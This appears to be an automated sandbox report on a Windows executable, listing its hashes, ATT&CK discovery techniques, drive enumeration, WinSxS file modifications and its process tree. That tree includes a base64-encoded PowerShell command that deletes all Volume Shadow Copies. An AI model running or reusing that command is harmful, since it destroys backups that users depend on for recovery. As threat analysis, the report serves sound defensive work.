bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1

General

Target

bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
Size

164KB
MD5

d451ce07fc15ee0527f68c2d99b1a934
SHA1

bb6d370e27761b1e48a09e197f8babb829343009
SHA256

bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1
SHA512

4ca1c377245edddf131d198ca9453087433c545532a71da6769f17083758691c95873c206ff82c2944343c17ce9877048225d13cf4efed7e5000cb75b5e960b7

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe

description	ioc	process
File opened (read-only)	\??\B:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\F:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\J:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\O:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\P:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\S:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\X:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\E:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\G:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\H:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\I:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\K:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\Y:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\M:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\N:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\Q:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\V:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\A:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\L:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\R:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\T:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\U:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\W:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened (read-only)	\??\Z:	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe

Drops file in Windows directory 64 IoCs

Processes:

bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe

description	ioc	process
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-a..structure.resources_31bf3856ad364e35_10.0.15063.0_en-us_1390cc3203d04dcf_apphelp.dll.mui_59096153	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.15063.0_el-gr_d1f73285f872ee81.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-f..eelawadeeui_regular_31bf3856ad364e35_10.0.15063.0_none_70a7191ccd7e3047.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-fixed_31bf3856ad364e35_10.0.15063.0_none_9023bb87676e429a.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-keyiso.resources_31bf3856ad364e35_10.0.15063.0_es-es_1b6a375ead065e2c_keyiso.dll.mui_4bbf12ff	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-winlogon-ext_31bf3856ad364e35_10.0.15063.0_none_94b3baffac9679b5.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.15063.0_es-mx_289be2d20b46e0d6.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_windows-defender-service_31bf3856ad364e35_10.0.15063.0_none_d6b9fc078f9b4d5a_msmpeng.exe_2f1c6923	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-i..i_initiator_service_31bf3856ad364e35_10.0.15063.0_none_f5dc2ec982476ba8_iscsidsc.dll_20ed5065	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-c..temminpnp.resources_31bf3856ad364e35_10.0.15063.0_es-es_a6b4da38ff64cc74.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-cryptsp-dll_31bf3856ad364e35_10.0.15063.0_none_3a7147463f9b3bd0.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-fixed_31bf3856ad364e35_10.0.15063.0_none_9023bb87676e429a_vgaf1256.fon_9bd7a63b	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.15063.0_none_2583321dfa2b45c4_ega80852.fon_608992fb	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..r_service.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_f299a3aaa1d11a48_iscsiexe.dll.mui_7d81b1cc	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..e-ws2ifsl.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_dd4c0092fa872345.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-rasserver.resources_31bf3856ad364e35_10.0.15063.0_es-es_9674f4b52991c8d8_rtm.dll.mui_55e4e990	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-s..-netlogon.resources_31bf3856ad364e35_10.0.15063.0_de-de_a23b327c9d21996e_netlogon.dll.mui_ecbeb9bd	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-security-schannel_31bf3856ad364e35_10.0.15063.0_none_3d7ece99c2725224.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..structure.resources_31bf3856ad364e35_10.0.15063.0_es-es_09077ec3cf967d79.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_en-gb_50ad0e299c666e9f.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-smartcardsubsystem_31bf3856ad364e35_10.0.15063.0_none_291118dda2c1a1ca_certprop.dll_0b11a6d7	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-windowsuiimmersive_31bf3856ad364e35_10.0.15063.0_none_42e3ac5a0cd7f838.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-rasserver.resources_31bf3856ad364e35_10.0.15063.0_es-es_9674f4b52991c8d8_mprdim.dll.mui_11b5ef08	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_1f0059fcf21e39ef_mofcomp.exe.mui_35badf56	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-f..ype-segoeui_regular_31bf3856ad364e35_10.0.15063.0_none_859ed1f2d02a9db5_segoeui.ttf_b39275ad	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_10.0.15063.0_es-es_d213d1b8a9dbdabf_gpsvc.dll.mui_0c160ac2	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-security-lsatrustlet_31bf3856ad364e35_10.0.15063.0_none_f5ad4336b7886518.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_10.0.15063.0_es-es_dc687c0ade3c9cba.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-coreos-minwin_31bf3856ad364e35_10.0.15063.0_none_6797a7fd6731f776.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-hardware-policy_31bf3856ad364e35_10.0.15063.0_none_13342771e2a38a67_hwpolicy.sys_e58c38aa	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-security-spp.resources_31bf3856ad364e35_10.0.15063.0_en-us_addbd04b6fa954b7.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-usermodepowerservice_31bf3856ad364e35_10.0.15063.0_none_6f1e604385420c54_umpo.dll_d1843b37	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-appid.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_f415df720d034833.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_pt-br_9188049a8e6fa576_bootmgfw.efi.mui_a6e78cfa	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-shcore_31bf3856ad364e35_10.0.15063.0_none_e1dc608f8e651b89.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.15063.0_es-es_7ef5fcfde83298af_userdeviceregistration.dll.mui_22ab8f29	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_ru-ru_453845783036acd5_msimsg.dll.mui_72e8994f	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-d..ient-core.resources_31bf3856ad364e35_10.0.15063.0_en-us_32ab8a096e6c998f_dnsapi.dll.mui_97465f8a	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-d..ndowmanager-effects_31bf3856ad364e35_10.0.15063.0_none_0c6c3963abedbb7f_wuceffects.dll_0c15b7d5	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-netio-infrastructure_31bf3856ad364e35_10.0.15063.0_none_7203f061227d02c2.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-appidcore.resources_31bf3856ad364e35_10.0.15063.0_en-us_6a6c9bb281748302.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-com-base-qfe-ole32_31bf3856ad364e35_10.0.15063.0_none_bd3180952b2019ec_ole32.dll_e9dcc2e3	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-fileinfominifilter_31bf3856ad364e35_10.0.15063.0_none_e7c8d45e6a1c8c7b_fileinfo.sys_9be2dfcd	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-h..p-listsvc.resources_31bf3856ad364e35_10.0.15063.0_en-us_71c1f73248e2ec42_listsvc.dll.mui_27f0fc85	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-cryptsp-dll_31bf3856ad364e35_10.0.15063.0_none_44c5f19873fbfdcb_cryptsp.dll_ae5341e1	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-s..ty-kerbclientshared_31bf3856ad364e35_10.0.15063.0_none_fd61363b291ec882_kerbclientshared.dll_1fa7b356	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_10.0.15063.0_en-us_87ac933f1cd28fdb.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-directui_31bf3856ad364e35_10.0.15063.0_none_c809cce62764b8db.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-v..skservice.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_ec49a83516f431cd.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-csrss_31bf3856ad364e35_10.0.15063.0_none_744c6763514529af.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-v..skservice.resources_31bf3856ad364e35_10.0.15063.0_de-de_14888a056ad026a8_vds.exe.mui_2268d934	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_10.0.15063.0_de-de_c5f11561ed21f5cb_axinstsv.dll.mui_be092a2d	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.15063.0_none_2583321dfa2b45c4_dosapp.fon_f239c304	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..geservice.resources_31bf3856ad364e35_10.0.15063.0_es-es_80c51b1009151e54_storsvc.dll.mui_2fc7b1d3	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..eservices.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_193bb5ceb03ac714_wiaservc.dll.mui_54051b53	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-winsock-core.resources_31bf3856ad364e35_10.0.15063.0_en-us_5cfc9994b735544f.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-appid_31bf3856ad364e35_10.0.15063.0_none_685fe984eaf6056e_appidcertstorecheck.exe_03352f5f	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-tcpip.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_7fd92574f8ebc00c_tcpipcfg.dll.mui_a5479fc1	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-userpowermanagement_31bf3856ad364e35_10.0.15063.0_none_be8221ec6a07dad4.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_10.0.15063.0_sv-se_b993099aee9048c9_bootmgr.exe.mui_c434701f	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..ndowmanager-effects_31bf3856ad364e35_10.0.15063.0_none_02178f11778cf984.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-h..p-provsvc.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_27105f0445a6f064.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.15063.0_ar-sa_91f9f4c8478981a6.manifest	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_windows-defender-service_31bf3856ad364e35_10.0.15063.0_none_d6b9fc078f9b4d5a_mpclient.dll_0a78b638	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exepowershell.exe

pid	process
3420	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
3420	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
2276	powershell.exe
2276	powershell.exe
2276	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeBackupPrivilege	848	vssvc.exe
Token: SeRestorePrivilege	848	vssvc.exe
Token: SeAuditPrivilege	848	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe

description	pid	process	target process
PID 3420 wrote to memory of 2276	3420	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe	powershell.exe
PID 3420 wrote to memory of 2276	3420	bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
"C:\Users\Admin\AppData\Local\Temp\bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe"
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:496

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:848

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2276-123-0x000002D6E65B0000-0x000002D6E65D2000-memory.dmp

Filesize
136KB

Download
memory/2276-126-0x000002D6E6640000-0x000002D6E6642000-memory.dmp

Filesize
8KB

Download
memory/2276-127-0x000002D6E6643000-0x000002D6E6645000-memory.dmp

Filesize
8KB

Download
memory/2276-129-0x000002D6E88A0000-0x000002D6E8916000-memory.dmp

Filesize
472KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads